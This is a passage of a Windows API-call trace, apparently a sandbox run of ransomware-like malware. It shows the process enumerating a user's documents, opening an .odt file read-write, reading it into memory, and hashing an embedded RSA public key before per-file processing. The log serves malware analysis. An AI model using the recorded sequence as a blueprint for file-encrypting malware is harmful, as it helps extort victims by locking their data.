[0199.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade8a8 | out: hHeap=0x2c0000) returned 1 [0199.404] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0199.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.404] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.405] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0199.405] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.405] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0199.405] PathFindFileNameW (pszPath="") returned="" [0199.405] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.405] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f77a900, ftCreationTime.dwHighDateTime=0x1d8995d, ftLastAccessTime.dwLowDateTime=0xbdb833e0, ftLastAccessTime.dwHighDateTime=0x1d89e8e, ftLastWriteTime.dwLowDateTime=0xbdb833e0, ftLastWriteTime.dwHighDateTime=0x1d89e8e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2a05da8 [0199.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.419] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4f77a900, ftCreationTime.dwHighDateTime=0x1d8995d, ftLastAccessTime.dwLowDateTime=0xbdb833e0, ftLastAccessTime.dwHighDateTime=0x1d89e8e, ftLastWriteTime.dwLowDateTime=0xbdb833e0, ftLastWriteTime.dwHighDateTime=0x1d89e8e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0199.420] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc437b70, ftCreationTime.dwHighDateTime=0x1d8a095, ftLastAccessTime.dwLowDateTime=0x461aca60, ftLastAccessTime.dwHighDateTime=0x1d8a6b2, ftLastWriteTime.dwLowDateTime=0x461aca60, ftLastWriteTime.dwHighDateTime=0x1d8a6b2, nFileSizeHigh=0x0, nFileSizeLow=0xc29b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="h0-NgmZ.odt", cAlternateFileName="")) returned 1 [0199.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ae8fe8 [0199.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x381bd0 [0199.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae8fe8 | out: hHeap=0x2c0000) returned 1 [0199.420] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\h0-NgmZ.odt") returned=".odt" [0199.420] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\8NNLi0kOEoM-mpUM785\\HIm fL\\4E_Qp5b8\\h0-NgmZ.odt" (normalized: "c:\\users\\keecfmwgj\\documents\\8nnli0koeom-mpum785\\him fl\\4e_qp5b8\\h0-ngmz.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0199.421] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=49819) returned 1 [0199.421] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0199.424] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xc275, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.424] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.425] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.426] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.426] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.426] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xc29b, lpOverlapped=0x0) returned 1 [0199.427] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0199.427] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.427] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.427] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31ba80) returned 1 [0199.428] CryptCreateHash (in: hProv=0x31ba80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0199.428] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.428] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0199.428] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0199.428] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0199.428] GetLastError () returned 0x0 [0199.428] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0199.428] CryptReleaseContext (hProv=0x31ba80, dwFlags=0x0) returned 1 [0199.428] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0199.428] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0199.429] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0199.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.429] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0199.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0199.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0199.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2a0) returned 0x2af7168 [0199.429] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.429] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0199.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0199.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0199.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adf6e0 [0199.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0199.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade8a8 [0199.429] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a40 [0199.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ade8f0 [0199.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a58 [0199.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a88 [0199.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0199.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6aa0 [0199.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0199.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0199.430] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aedfa0 [0199.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0199.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0199.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0199.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7dc0 [0199.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6aa0 [0199.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6a88 [0199.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0199.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0199.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0199.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0199.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0199.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0199.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0199.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0199.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0199.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aedfa0 | out: hHeap=0x2c0000) returned 1 [0199.432] GetCurrentThreadId () returned 0x5d8 [0199.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0199.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2af5c30 [0199.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42548 [0199.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31ba80 [0199.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0199.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0199.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0199.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.433] GetCurrentThreadId () returned 0x5d8 [0199.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0199.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0199.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0199.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0199.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40478 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ae8 [0199.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a88 [0199.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0199.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6aa0 [0199.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0199.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6a70 [0199.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b00 [0199.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0199.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ad0 [0199.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6ab8 [0199.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6b18 [0199.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6ab8 [0199.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ad0 | out: hHeap=0x2c0000) returned 1 [0199.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0199.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0199.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0199.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0199.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7a40 [0199.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6a88 [0199.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0199.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2adf8d8 [0199.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0199.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0199.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b18 | out: hHeap=0x2c0000) returned 1 [0199.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0199.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0199.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0199.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0199.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0199.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a88 | out: hHeap=0x2c0000) returned 1 [0199.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0199.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0199.437] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0199.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0199.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31ba80 | out: hHeap=0x2c0000) returned 1 [0199.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0199.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0199.437] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0199.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0199.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0199.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0199.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0199.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0199.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ab8 | out: hHeap=0x2c0000) returned 1 [0199.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0199.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6b00 | out: hHeap=0x2c0000) returned 1 [0199.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0199.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6aa0 | out: hHeap=0x2c0000) returned 1 [0199.438] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a70 | out: hHeap=0x2c0000) returned 1 [0199.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0199.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0199.439] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0199.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6a58 | out: hHeap=0x2c0000) returned 1 [0199.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade8f0 | out: hHeap=0x2c0000) returned 1 [0199.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8d8 | out: hHeap=0x2c0000) returned 1 [0199.440] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0199.441] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 